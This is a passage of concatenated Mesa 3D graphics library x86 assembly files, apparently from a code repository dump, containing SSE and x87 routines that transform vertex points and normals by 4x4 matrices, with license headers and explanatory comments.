MOV_L( REGOFF(V4F_COUNT, ESI), ECX ) /* source count */
TEST_L( ECX, ECX)
JZ( LLBL(K_GTP13DNRR_finish) ) /* count was zero; go to finish */
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX ) /* stride */
OR_L( CONST(VEC_SIZE_3), REGOFF(V4F_FLAGS, EDI) ) /* set dest flags */
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) ) /* set dest count */
MOV_L( CONST(3), REGOFF(V4F_SIZE, EDI) ) /* set dest size */
SHL_L( CONST(4), ECX ) /* count *= 16 */
MOV_L( REGOFF(V4F_START, ESI), ESI ) /* ptr to first source vertex */
MOV_L( REGOFF(V4F_START, EDI), EDI ) /* ptr to first dest vertex */
ADD_L( EDI, ECX ) /* count += dest ptr */
ALIGNTEXT32
MOVSS( M(0), XMM0 ) /* m0 */
MOVSS( M(12), XMM1 ) /* m12 */
MOVSS( M(13), XMM2 ) /* m13 */
MOVSS( M(14), XMM3 ) /* m14 */
ALIGNTEXT32
LLBL(K_GTP13DNRR_top):
MOVSS( S(0), XMM4 ) /* ox */
MULSS( XMM0, XMM4 ) /* ox*m0 */
ADDSS( XMM1, XMM4 ) /* ox*m0+m12 */
MOVSS( XMM4, D(0) )
MOVSS( XMM2, D(1) ) /* constant m13 */
MOVSS( XMM3, D(2) ) /* constant m14 */
LLBL(K_GTP13DNRR_skip):
ADD_L ( CONST(16), EDI )
ADD_L ( EAX, ESI )
CMP_L ( ECX, EDI )
JNE ( LLBL(K_GTP13DNRR_top) )
LLBL(K_GTP13DNRR_finish):
POP_L ( EDI )
POP_L ( ESI )
RET
#undef FRAME_OFFSET
/*
 * _mesa_sse_transform_points1_perspective
 *
 * SSE transform of 1-component points by a perspective matrix:
 * D(0) = ox*m0, D(1) = 0, D(2) = m14, D(3) = 0 (XMM0 is zeroed once
 * with XORPS and reused for both zero stores).  Dest: size 4,
 * VEC_SIZE_4 flags.
 */
ALIGNTEXT4
GLOBL GLNAME(_mesa_sse_transform_points1_perspective)
HIDDEN(_mesa_sse_transform_points1_perspective)
GLNAME(_mesa_sse_transform_points1_perspective):
#define FRAME_OFFSET 8
PUSH_L ( ESI )
PUSH_L ( EDI )
MOV_L( REGOFF(OFFSET_SOURCE+8, ESP), ESI ) /* ptr to source GLvector4f */
MOV_L( REGOFF(OFFSET_DEST+8, ESP), EDI ) /* ptr to dest GLvector4f */
MOV_L( ARG_MATRIX, EDX ) /* ptr to matrix */
MOV_L( REGOFF(V4F_COUNT, ESI), ECX ) /* source count */
TEST_L( ECX, ECX)
JZ( LLBL(K_GTP13PR_finish) ) /* count was zero; go to finish */
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX ) /* stride */
OR_L( CONST(VEC_SIZE_4), REGOFF(V4F_FLAGS, EDI) ) /* set dest flags */
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) ) /* set dest count */
MOV_L( CONST(4), REGOFF(V4F_SIZE, EDI) ) /* set dest size */
SHL_L( CONST(4), ECX ) /* count *= 16 */
MOV_L( REGOFF(V4F_START, ESI), ESI ) /* ptr to first source vertex */
MOV_L( REGOFF(V4F_START, EDI), EDI ) /* ptr to first dest vertex */
ADD_L( EDI, ECX ) /* count += dest ptr */
ALIGNTEXT32
XORPS( XMM0, XMM0 ) /* 0 | 0 | 0 | 0 */
MOVSS( M(0), XMM1 ) /* m0 */
MOVSS( M(14), XMM2 ) /* m14 */
ALIGNTEXT32
LLBL(K_GTP13PR_top):
MOVSS( S(0), XMM3 ) /* ox */
MULSS( XMM1, XMM3 ) /* ox*m0 */
MOVSS( XMM3, D(0) ) /* ox*m0->D(0) */
MOVSS( XMM2, D(2) ) /* m14->D(2) */
MOVSS( XMM0, D(1) ) /* D(1) = 0 */
MOVSS( XMM0, D(3) ) /* D(3) = 0 */
LLBL(K_GTP13PR_skip):
ADD_L( CONST(16), EDI )
ADD_L( EAX, ESI )
CMP_L( ECX, EDI )
JNE( LLBL(K_GTP13PR_top) )
LLBL(K_GTP13PR_finish):
POP_L ( EDI )
POP_L ( ESI )
RET
#undef FRAME_OFFSET
/*
 * _mesa_sse_transform_points1_2d
 *
 * SSE transform of 1-component points to 2D:
 * (D(0),D(1)) = ox*(m0,m1) + (m12,m13); only the low two lanes are
 * stored (MOVLPS).  Dest: size 2, VEC_SIZE_2 flags.
 */
ALIGNTEXT4
GLOBL GLNAME(_mesa_sse_transform_points1_2d)
HIDDEN(_mesa_sse_transform_points1_2d)
GLNAME(_mesa_sse_transform_points1_2d):
#define FRAME_OFFSET 8
PUSH_L( ESI )
PUSH_L( EDI )
MOV_L( REGOFF(OFFSET_SOURCE+8, ESP), ESI ) /* ptr to source GLvector4f */
MOV_L( REGOFF(OFFSET_DEST+8, ESP), EDI ) /* ptr to dest GLvector4f */
MOV_L( ARG_MATRIX, EDX ) /* ptr to matrix */
MOV_L( REGOFF(V4F_COUNT, ESI), ECX ) /* source count */
TEST_L( ECX, ECX)
JZ( LLBL(K_GTP13P2DR_finish) ) /* count was zero; go to finish */
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX ) /* stride */
OR_L( CONST(VEC_SIZE_2), REGOFF(V4F_FLAGS, EDI) ) /* set dest flags */
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) ) /* set dest count */
MOV_L( CONST(2), REGOFF(V4F_SIZE, EDI) ) /* set dest size */
SHL_L( CONST(4), ECX ) /* count *= 16 */
MOV_L( REGOFF(V4F_START, ESI), ESI ) /* ptr to first source vertex */
MOV_L( REGOFF(V4F_START, EDI), EDI ) /* ptr to first dest vertex */
ADD_L( EDI, ECX ) /* count += dest ptr */
ALIGNTEXT32
MOVLPS( M(0), XMM0 ) /* m1 | m0 */
MOVLPS( M(12), XMM1 ) /* m13 | m12 */
ALIGNTEXT32
LLBL(K_GTP13P2DR_top):
MOVSS( S(0), XMM2 ) /* ox */
SHUFPS( CONST(0x0), XMM2, XMM2 ) /* ox | ox | ox | ox */
MULPS( XMM0, XMM2 ) /* - | - | ox*m1 | ox*m0 */
ADDPS( XMM1, XMM2 ) /* - | - | ox*m1+m13 | ox*m0+m12 */
MOVLPS( XMM2, D(0) ) /* store low two lanes only */
LLBL(K_GTP13P2DR_skip):
ADD_L ( CONST(16), EDI )
ADD_L ( EAX, ESI )
CMP_L ( ECX, EDI )
JNE ( LLBL(K_GTP13P2DR_top) )
LLBL(K_GTP13P2DR_finish):
POP_L ( EDI )
POP_L ( ESI )
RET
#undef FRAME_OFFSET
/*
 * _mesa_sse_transform_points1_2d_no_rot
 *
 * SSE transform of 1-component points, 2D scale+translate only:
 * D(0) = ox*m0 + m12; D(1) = m13 is a per-vertex constant.
 * Dest: size 2, VEC_SIZE_2 flags.
 */
ALIGNTEXT4
GLOBL GLNAME(_mesa_sse_transform_points1_2d_no_rot)
HIDDEN(_mesa_sse_transform_points1_2d_no_rot)
GLNAME(_mesa_sse_transform_points1_2d_no_rot):
#define FRAME_OFFSET 8
PUSH_L( ESI )
PUSH_L( EDI )
MOV_L( REGOFF(OFFSET_SOURCE+8, ESP), ESI ) /* ptr to source GLvector4f */
MOV_L( REGOFF(OFFSET_DEST+8, ESP), EDI ) /* ptr to dest GLvector4f */
MOV_L( ARG_MATRIX, EDX ) /* ptr to matrix */
MOV_L( REGOFF(V4F_COUNT, ESI), ECX ) /* source count */
TEST_L( ECX, ECX)
JZ( LLBL(K_GTP13P2DNRR_finish) ) /* count was zero; go to finish */
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX ) /* stride */
OR_L( CONST(VEC_SIZE_2), REGOFF(V4F_FLAGS, EDI) ) /* set dest flags */
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) ) /* set dest count */
MOV_L( CONST(2), REGOFF(V4F_SIZE, EDI) ) /* set dest size */
SHL_L( CONST(4), ECX ) /* count *= 16 */
MOV_L( REGOFF(V4F_START, ESI), ESI ) /* ptr to first source vertex */
MOV_L( REGOFF(V4F_START, EDI), EDI ) /* ptr to first dest vertex */
ADD_L( EDI, ECX ) /* count += dest ptr */
ALIGNTEXT32
MOVSS( M(0), XMM0 ) /* m0 */
MOVSS( M(12), XMM1 ) /* m12 */
MOVSS( M(13), XMM2 ) /* m13 */
ALIGNTEXT32
LLBL(K_GTP13P2DNRR_top):
MOVSS( S(0), XMM3 ) /* ox */
MULSS( XMM0, XMM3 ) /* ox*m0 */
ADDSS( XMM1, XMM3 ) /* ox*m0+m12 */
MOVSS( XMM3, D(0) )
MOVSS( XMM2, D(1) ) /* constant m13 */
LLBL(K_GTP13P2DNRR_skip):
ADD_L( CONST(16), EDI )
ADD_L( EAX, ESI )
CMP_L( ECX, EDI )
JNE( LLBL(K_GTP13P2DNRR_top) )
LLBL(K_GTP13P2DNRR_finish):
POP_L( EDI )
POP_L( ESI )
RET
#undef FRAME_OFFSET
/*
 * _mesa_sse_transform_points1_3d
 *
 * SSE transform of 1-component points to 3D: computes all four lanes
 * of ox*M[0..3] + M[12..15], stores the low pair with MOVLPS, then
 * UNPCKHPS brings lane 2 down so MOVSS can store D(2).  Dest: size 3,
 * VEC_SIZE_3 flags.
 */
ALIGNTEXT4
GLOBL GLNAME(_mesa_sse_transform_points1_3d)
HIDDEN(_mesa_sse_transform_points1_3d)
GLNAME(_mesa_sse_transform_points1_3d):
#define FRAME_OFFSET 8
PUSH_L( ESI )
PUSH_L( EDI )
MOV_L( REGOFF(OFFSET_SOURCE+8, ESP), ESI ) /* ptr to source GLvector4f */
MOV_L( REGOFF(OFFSET_DEST+8, ESP), EDI ) /* ptr to dest GLvector4f */
MOV_L( ARG_MATRIX, EDX ) /* ptr to matrix */
MOV_L( REGOFF(V4F_COUNT, ESI), ECX ) /* source count */
TEST_L( ECX, ECX)
JZ( LLBL(K_GTP13P3DR_finish) ) /* count was zero; go to finish */
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX ) /* stride */
OR_L( CONST(VEC_SIZE_3), REGOFF(V4F_FLAGS, EDI) ) /* set dest flags */
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) ) /* set dest count */
MOV_L( CONST(3), REGOFF(V4F_SIZE, EDI) ) /* set dest size */
SHL_L( CONST(4), ECX ) /* count *= 16 */
MOV_L( REGOFF(V4F_START, ESI), ESI ) /* ptr to first source vertex */
MOV_L( REGOFF(V4F_START, EDI), EDI ) /* ptr to first dest vertex */
ADD_L( EDI, ECX ) /* count += dest ptr */
ALIGNTEXT32
MOVAPS( M(0), XMM0 ) /* m3 | m2 | m1 | m0 */
MOVAPS( M(12), XMM1 ) /* m15 | m14 | m13 | m12 */
ALIGNTEXT32
LLBL(K_GTP13P3DR_top):
MOVSS( S(0), XMM2 ) /* ox */
SHUFPS( CONST(0x0), XMM2, XMM2 ) /* ox | ox | ox | ox */
MULPS( XMM0, XMM2 ) /* ox*m3 | ox*m2 | ox*m1 | ox*m0 */
ADDPS( XMM1, XMM2 ) /* +m15 | +m14 | +m13 | +m12 */
MOVLPS( XMM2, D(0) ) /* - | - | ->D(1)| ->D(0)*/
UNPCKHPS( XMM2, XMM2 ) /* ox*m3+m15 | ox*m3+m15 | ox*m2+m14 | ox*m2+m14 */
MOVSS( XMM2, D(2) ) /* lane 2 -> D(2) */
LLBL(K_GTP13P3DR_skip):
ADD_L( CONST(16), EDI )
ADD_L( EAX, ESI )
CMP_L( ECX, EDI )
JNE( LLBL(K_GTP13P3DR_top) )
LLBL(K_GTP13P3DR_finish):
POP_L( EDI )
POP_L( ESI )
RET
#undef FRAME_OFFSET
#endif
#if defined (__ELF__) && defined (__linux__)
.section .note.GNU-stack,"",%progbits
#endif
|
AIFM-sys/AIFM
| 7,745
|
shenango/apps/parsec/pkgs/libs/mesa/src/src/mesa/x86/sse_normal.S
|
/* $Id: sse_normal.S,v 1.1.1.1 2012/03/29 17:22:10 uid42307 Exp $ */
/*
* Mesa 3-D graphics library
* Version: 3.5
*
* Copyright (C) 1999-2001 Brian Paul All Rights Reserved.
*
* Permission is hereby granted, free of charge, to any person obtaining a
* copy of this software and associated documentation files (the "Software"),
* to deal in the Software without restriction, including without limitation
* the rights to use, copy, modify, merge, publish, distribute, sublicense,
* and/or sell copies of the Software, and to permit persons to whom the
* Software is furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included
* in all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
* BRIAN PAUL BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN
* AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
* CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
*/
/** TODO:
* - insert PREFETCH instructions to avoid cache-misses !
* - some more optimizations are possible...
* - for 40-50% more performance in the SSE-functions, the
* data (trans-matrix, src_vert, dst_vert) needs to be 16byte aligned !
*/
#ifdef USE_SSE_ASM
#include "matypes.h"
#include "norm_args.h"
SEG_TEXT
#define M(i) REGOFF(i * 4, EDX)
#define S(i) REGOFF(i * 4, ESI)
#define D(i) REGOFF(i * 4, EDI)
#define STRIDE REGOFF(12, ESI)
/*
 * _mesa_sse_transform_rescale_normals_no_rot
 *
 * SSE normal transform for a no-rotation matrix: uses the diagonal of
 * matrix->inv scaled by ARG_SCALE, i.e.
 *   out = (ux*m0*scale, uy*m5*scale, uz*m10*scale).
 * Loop regs: ESI src, EDI dst, EAX stride, ECX end-of-dest sentinel.
 * XMM1 = (m5*scale | m0*scale), XMM0 = m10*scale, preloaded once.
 */
ALIGNTEXT16
GLOBL GLNAME(_mesa_sse_transform_rescale_normals_no_rot)
HIDDEN(_mesa_sse_transform_rescale_normals_no_rot)
GLNAME(_mesa_sse_transform_rescale_normals_no_rot):
#define FRAME_OFFSET 8
PUSH_L ( ESI )
PUSH_L ( EDI )
MOV_L ( ARG_IN, ESI ) /* ptr to source GLvector3f */
MOV_L ( ARG_DEST, EDI ) /* ptr to dest GLvector3f */
MOV_L ( ARG_MAT, EDX ) /* ptr to matrix */
MOV_L ( REGOFF(MATRIX_INV, EDX), EDX) /* matrix->inv */
MOV_L ( REGOFF(V4F_COUNT, ESI), ECX ) /* source count */
TEST_L ( ECX, ECX )
JZ( LLBL(K_G3TRNNRR_finish) ) /* count was zero; go to finish */
MOV_L ( STRIDE, EAX ) /* stride */
MOV_L ( ECX, REGOFF(V4F_COUNT, EDI) ) /* set dest-count */
IMUL_L( CONST(16), ECX ) /* count *= 16 */
MOV_L( REGOFF(V4F_START, ESI), ESI ) /* ptr to first source vertex */
MOV_L( REGOFF(V4F_START, EDI), EDI ) /* ptr to first dest vertex */
ADD_L( EDI, ECX ) /* count += dest ptr */
ALIGNTEXT32
MOVSS ( M(0), XMM1 ) /* m0 */
MOVSS ( M(5), XMM2 ) /* m5 */
UNPCKLPS( XMM2, XMM1 ) /* m5 | m0 */
MOVSS ( ARG_SCALE, XMM0 ) /* scale */
SHUFPS ( CONST(0x0), XMM0, XMM0 ) /* scale | scale */
MULPS ( XMM0, XMM1 ) /* m5*scale | m0*scale */
MULSS ( M(10), XMM0 ) /* m10*scale */
ALIGNTEXT32
LLBL(K_G3TRNNRR_top):
MOVLPS ( S(0), XMM2 ) /* uy | ux */
MULPS ( XMM1, XMM2 ) /* uy*m5*scale | ux*m0*scale */
MOVLPS ( XMM2, D(0) ) /* ->D(1) | D(0) */
MOVSS ( S(2), XMM2 ) /* uz */
MULSS ( XMM0, XMM2 ) /* uz*m10*scale */
MOVSS ( XMM2, D(2) ) /* ->D(2) */
LLBL(K_G3TRNNRR_skip):
ADD_L ( CONST(16), EDI )
ADD_L ( EAX, ESI )
CMP_L ( ECX, EDI )
JNE ( LLBL(K_G3TRNNRR_top) )
LLBL(K_G3TRNNRR_finish):
POP_L ( EDI )
POP_L ( ESI )
RET
#undef FRAME_OFFSET
/*
 * _mesa_sse_transform_rescale_normals
 *
 * SSE normal transform using the upper 3x3 of matrix->inv, scaled by
 * ARG_SCALE:
 *   D(0) = (ux*m0 + uy*m1 + uz*m2) * scale
 *   D(1) = (ux*m4 + uy*m5 + uz*m6) * scale
 *   D(2) = (ux*m8 + uy*m9 + uz*m10) * scale
 * The x/y lanes use pre-scaled column pairs in XMM0-XMM2; the z row
 * uses m8*scale (XMM6) and m9*scale (XMM7) preloaded.
 * NOTE(review): m10*scale is recomputed from memory on every loop
 * iteration (all eight 32-bit XMM regs are otherwise occupied), so
 * that reload is loop-invariant work that cannot easily be hoisted.
 */
ALIGNTEXT16
GLOBL GLNAME(_mesa_sse_transform_rescale_normals)
HIDDEN(_mesa_sse_transform_rescale_normals)
GLNAME(_mesa_sse_transform_rescale_normals):
#define FRAME_OFFSET 8
PUSH_L ( ESI )
PUSH_L ( EDI )
MOV_L ( ARG_IN, ESI ) /* ptr to source GLvector3f */
MOV_L ( ARG_DEST, EDI ) /* ptr to dest GLvector3f */
MOV_L ( ARG_MAT, EDX ) /* ptr to matrix */
MOV_L ( REGOFF(MATRIX_INV, EDX), EDX) /* matrix->inv */
MOV_L ( REGOFF(V4F_COUNT, ESI), ECX ) /* source count */
TEST_L ( ECX, ECX )
JZ( LLBL(K_G3TRNR_finish) ) /* count was zero; go to finish */
MOV_L ( STRIDE, EAX ) /* stride */
MOV_L ( ECX, REGOFF(V4F_COUNT, EDI) ) /* set dest-count */
IMUL_L( CONST(16), ECX ) /* count *= 16 */
MOV_L( REGOFF(V4F_START, ESI), ESI ) /* ptr to first source vertex */
MOV_L( REGOFF(V4F_START, EDI), EDI ) /* ptr to first dest vertex */
ADD_L( EDI, ECX ) /* count += dest ptr */
ALIGNTEXT32
MOVSS ( M(0), XMM0 ) /* m0 */
MOVSS ( M(4), XMM1 ) /* m4 */
UNPCKLPS( XMM1, XMM0 ) /* m4 | m0 */
MOVSS ( ARG_SCALE, XMM4 ) /* scale */
SHUFPS ( CONST(0x0), XMM4, XMM4 ) /* scale | scale */
MULPS ( XMM4, XMM0 ) /* m4*scale | m0*scale */
MOVSS ( M(1), XMM1 ) /* m1 */
MOVSS ( M(5), XMM2 ) /* m5 */
UNPCKLPS( XMM2, XMM1 ) /* m5 | m1 */
MULPS ( XMM4, XMM1 ) /* m5*scale | m1*scale */
MOVSS ( M(2), XMM2 ) /* m2 */
MOVSS ( M(6), XMM3 ) /* m6 */
UNPCKLPS( XMM3, XMM2 ) /* m6 | m2 */
MULPS ( XMM4, XMM2 ) /* m6*scale | m2*scale */
MOVSS ( M(8), XMM6 ) /* m8 */
MULSS ( ARG_SCALE, XMM6 ) /* m8*scale */
MOVSS ( M(9), XMM7 ) /* m9 */
MULSS ( ARG_SCALE, XMM7 ) /* m9*scale */
ALIGNTEXT32
LLBL(K_G3TRNR_top):
MOVSS ( S(0), XMM3 ) /* ux */
SHUFPS ( CONST(0x0), XMM3, XMM3 ) /* ux | ux */
MULPS ( XMM0, XMM3 ) /* ux*m4 | ux*m0 */
MOVSS ( S(1), XMM4 ) /* uy */
SHUFPS ( CONST(0x0), XMM4, XMM4 ) /* uy | uy */
MULPS ( XMM1, XMM4 ) /* uy*m5 | uy*m1 */
MOVSS ( S(2), XMM5 ) /* uz */
SHUFPS ( CONST(0x0), XMM5, XMM5 ) /* uz | uz */
MULPS ( XMM2, XMM5 ) /* uz*m6 | uz*m2 */
ADDPS ( XMM4, XMM3 ) /* accumulate y terms */
ADDPS ( XMM5, XMM3 ) /* accumulate z terms */
MOVLPS ( XMM3, D(0) ) /* store D(1) | D(0) */
MOVSS ( M(10), XMM3 ) /* m10 */
MULSS ( ARG_SCALE, XMM3 ) /* m10*scale */
MULSS ( S(2), XMM3 ) /* m10*scale*uz */
MOVSS ( S(1), XMM4 ) /* uy */
MULSS ( XMM7, XMM4 ) /* uy*m9*scale */
MOVSS ( S(0), XMM5 ) /* ux */
MULSS ( XMM6, XMM5 ) /* ux*m8*scale */
ADDSS ( XMM4, XMM3 ) /* + uy term */
ADDSS ( XMM5, XMM3 ) /* + ux term */
MOVSS ( XMM3, D(2) ) /* store D(2) */
LLBL(K_G3TRNR_skip):
ADD_L ( CONST(16), EDI )
ADD_L ( EAX, ESI )
CMP_L ( ECX, EDI )
JNE ( LLBL(K_G3TRNR_top) )
LLBL(K_G3TRNR_finish):
POP_L ( EDI )
POP_L ( ESI )
RET
#undef FRAME_OFFSET
/*
 * _mesa_sse_transform_normals_no_rot
 *
 * SSE normal transform for a no-rotation matrix, without rescale:
 * uses the diagonal of matrix->inv, i.e.
 *   out = (ux*m0, uy*m5, uz*m10).
 * XMM0 = (m5 | m0) and XMM1 = m10 are preloaded outside the loop.
 */
ALIGNTEXT16
GLOBL GLNAME(_mesa_sse_transform_normals_no_rot)
HIDDEN(_mesa_sse_transform_normals_no_rot)
GLNAME(_mesa_sse_transform_normals_no_rot):
#define FRAME_OFFSET 8
PUSH_L ( ESI )
PUSH_L ( EDI )
MOV_L ( ARG_IN, ESI ) /* ptr to source GLvector3f */
MOV_L ( ARG_DEST, EDI ) /* ptr to dest GLvector3f */
MOV_L ( ARG_MAT, EDX ) /* ptr to matrix */
MOV_L ( REGOFF(MATRIX_INV, EDX), EDX) /* matrix->inv */
MOV_L ( REGOFF(V4F_COUNT, ESI), ECX ) /* source count */
TEST_L ( ECX, ECX )
JZ( LLBL(K_G3TNNRR_finish) ) /* count was zero; go to finish */
MOV_L ( STRIDE, EAX ) /* stride */
MOV_L ( ECX, REGOFF(V4F_COUNT, EDI) ) /* set dest-count */
IMUL_L( CONST(16), ECX ) /* count *= 16 */
MOV_L( REGOFF(V4F_START, ESI), ESI ) /* ptr to first source vertex */
MOV_L( REGOFF(V4F_START, EDI), EDI ) /* ptr to first dest vertex */
ADD_L( EDI, ECX ) /* count += dest ptr */
ALIGNTEXT32
MOVSS( M(0), XMM0 ) /* m0 */
MOVSS( M(5), XMM1 ) /* m5 */
UNPCKLPS( XMM1, XMM0 ) /* m5 | m0 */
MOVSS( M(10), XMM1 ) /* m10 */
ALIGNTEXT32
LLBL(K_G3TNNRR_top):
MOVLPS( S(0), XMM2 ) /* uy | ux */
MULPS( XMM0, XMM2 ) /* uy*m5 | ux*m0 */
MOVLPS( XMM2, D(0) ) /* store D(1) | D(0) */
MOVSS( S(2), XMM2 ) /* uz */
MULSS( XMM1, XMM2 ) /* uz*m10 */
MOVSS( XMM2, D(2) ) /* store D(2) */
LLBL(K_G3TNNRR_skip):
ADD_L ( CONST(16), EDI )
ADD_L ( EAX, ESI )
CMP_L ( ECX, EDI )
JNE ( LLBL(K_G3TNNRR_top) )
LLBL(K_G3TNNRR_finish):
POP_L ( EDI )
POP_L ( ESI )
RET
#undef FRAME_OFFSET
#endif
#if defined (__ELF__) && defined (__linux__)
.section .note.GNU-stack,"",%progbits
#endif
|
AIFM-sys/AIFM
| 12,068
|
shenango/apps/parsec/pkgs/libs/mesa/src/src/mesa/x86/x86_xform2.S
|
/* $Id: x86_xform2.S,v 1.1.1.1 2012/03/29 17:22:10 uid42307 Exp $ */
/*
* Mesa 3-D graphics library
* Version: 3.5
*
* Copyright (C) 1999-2001 Brian Paul All Rights Reserved.
*
* Permission is hereby granted, free of charge, to any person obtaining a
* copy of this software and associated documentation files (the "Software"),
* to deal in the Software without restriction, including without limitation
* the rights to use, copy, modify, merge, publish, distribute, sublicense,
* and/or sell copies of the Software, and to permit persons to whom the
* Software is furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included
* in all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
* BRIAN PAUL BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN
* AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
* CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
*/
/*
* NOTE: Avoid using spaces in between '(' ')' and arguments, especially
* with macros like CONST, LLBL that expand to CONCAT(...). Putting spaces
* in there will break the build on some platforms.
*/
#include "matypes.h"
#include "xform_args.h"
SEG_TEXT
/* IEEE-754 single-precision bit patterns, stored with integer MOVs:
 * 1065353216 == 0x3F800000 == 1.0f */
#define FP_ONE 1065353216
#define FP_ZERO 0
/* Source vertex components: ESI points at the current source vertex */
#define SRC0 REGOFF(0, ESI)
#define SRC1 REGOFF(4, ESI)
#define SRC2 REGOFF(8, ESI)
#define SRC3 REGOFF(12, ESI)
/* Destination vertex components: EDI points at the current dest vertex */
#define DST0 REGOFF(0, EDI)
#define DST1 REGOFF(4, EDI)
#define DST2 REGOFF(8, EDI)
#define DST3 REGOFF(12, EDI)
/* Matrix elements: EDX points at 16 consecutive floats m0..m15.
 * The transforms below compute dst[i] = sum_j src[j]*m[4j+i]. */
#define MAT0 REGOFF(0, EDX)
#define MAT1 REGOFF(4, EDX)
#define MAT2 REGOFF(8, EDX)
#define MAT3 REGOFF(12, EDX)
#define MAT4 REGOFF(16, EDX)
#define MAT5 REGOFF(20, EDX)
#define MAT6 REGOFF(24, EDX)
#define MAT7 REGOFF(28, EDX)
#define MAT8 REGOFF(32, EDX)
#define MAT9 REGOFF(36, EDX)
#define MAT10 REGOFF(40, EDX)
#define MAT11 REGOFF(44, EDX)
#define MAT12 REGOFF(48, EDX)
#define MAT13 REGOFF(52, EDX)
#define MAT14 REGOFF(56, EDX)
#define MAT15 REGOFF(60, EDX)
/*-----------------------------------------------------------------------
 * _mesa_x86_transform_points2_general
 * x87 transform of 2-component points by a full 4x4 matrix:
 *   dst[i] = x*m[i] + y*m[4+i] + m[12+i]   for i = 0..3
 * (equivalent to a 4x4 transform with implicit z=0, w=1).
 * Args (via ARG_* macros): source GLvector4f, dest GLvector4f, matrix.
 * Sets dest size=4, flags |= VEC_SIZE_4, count = source count.
 * Register roles in loop: ESI=src ptr, EDI=dst ptr, EDX=matrix,
 * EAX=src stride, ECX=dst end address (loop bound).
 * Clobbers: EAX, ECX, EDX, x87 stack (left empty on exit).
 *---------------------------------------------------------------------*/
ALIGNTEXT16
GLOBL GLNAME( _mesa_x86_transform_points2_general )
HIDDEN(_mesa_x86_transform_points2_general)
GLNAME( _mesa_x86_transform_points2_general ):
#define FRAME_OFFSET 8
PUSH_L( ESI )
PUSH_L( EDI )
MOV_L( ARG_SOURCE, ESI )
MOV_L( ARG_DEST, EDI )
MOV_L( ARG_MATRIX, EDX )
MOV_L( REGOFF(V4F_COUNT, ESI), ECX )
TEST_L( ECX, ECX )
JZ( LLBL(x86_p2_gr_done) )
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX )
OR_L( CONST(VEC_SIZE_4), REGOFF(V4F_FLAGS, EDI) )
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) )
MOV_L( CONST(4), REGOFF(V4F_SIZE, EDI) )
SHL_L( CONST(4), ECX )
/* ECX = count*16 bytes; adding dst start makes it the end address */
MOV_L( REGOFF(V4F_START, ESI), ESI )
MOV_L( REGOFF(V4F_START, EDI), EDI )
ADD_L( EDI, ECX )
ALIGNTEXT16
LLBL(x86_p2_gr_loop):
/* Interleave the eight products x*m0..m3 and y*m4..m7 on the x87
 * stack, then pair-wise FADDP them into the four dst components. */
FLD_S( SRC0 ) /* F4 */
FMUL_S( MAT0 )
FLD_S( SRC0 ) /* F5 F4 */
FMUL_S( MAT1 )
FLD_S( SRC0 ) /* F6 F5 F4 */
FMUL_S( MAT2 )
FLD_S( SRC0 ) /* F7 F6 F5 F4 */
FMUL_S( MAT3 )
FLD_S( SRC1 ) /* F0 F7 F6 F5 F4 */
FMUL_S( MAT4 )
FLD_S( SRC1 ) /* F1 F0 F7 F6 F5 F4 */
FMUL_S( MAT5 )
FLD_S( SRC1 ) /* F2 F1 F0 F7 F6 F5 F4 */
FMUL_S( MAT6 )
FLD_S( SRC1 ) /* F3 F2 F1 F0 F7 F6 F5 F4 */
FMUL_S( MAT7 )
FXCH( ST(3) ) /* F0 F2 F1 F3 F7 F6 F5 F4 */
FADDP( ST0, ST(7) ) /* F2 F1 F3 F7 F6 F5 F4 */
FXCH( ST(1) ) /* F1 F2 F3 F7 F6 F5 F4 */
FADDP( ST0, ST(5) ) /* F2 F3 F7 F6 F5 F4 */
FADDP( ST0, ST(3) ) /* F3 F7 F6 F5 F4 */
FADDP( ST0, ST(1) ) /* F7 F6 F5 F4 */
/* Add the translation row m12..m15 and store */
FXCH( ST(3) ) /* F4 F6 F5 F7 */
FADD_S( MAT12 )
FXCH( ST(2) ) /* F5 F6 F4 F7 */
FADD_S( MAT13 )
FXCH( ST(1) ) /* F6 F5 F4 F7 */
FADD_S( MAT14 )
FXCH( ST(3) ) /* F7 F5 F4 F6 */
FADD_S( MAT15 )
FXCH( ST(2) ) /* F4 F5 F7 F6 */
FSTP_S( DST0 ) /* F5 F7 F6 */
FSTP_S( DST1 ) /* F7 F6 */
FXCH( ST(1) ) /* F6 F7 */
FSTP_S( DST2 ) /* F7 */
FSTP_S( DST3 ) /* */
LLBL(x86_p2_gr_skip):
ADD_L( CONST(16), EDI )
ADD_L( EAX, ESI )
CMP_L( ECX, EDI )
JNE( LLBL(x86_p2_gr_loop) )
LLBL(x86_p2_gr_done):
POP_L( EDI )
POP_L( ESI )
RET
#undef FRAME_OFFSET
/*-----------------------------------------------------------------------
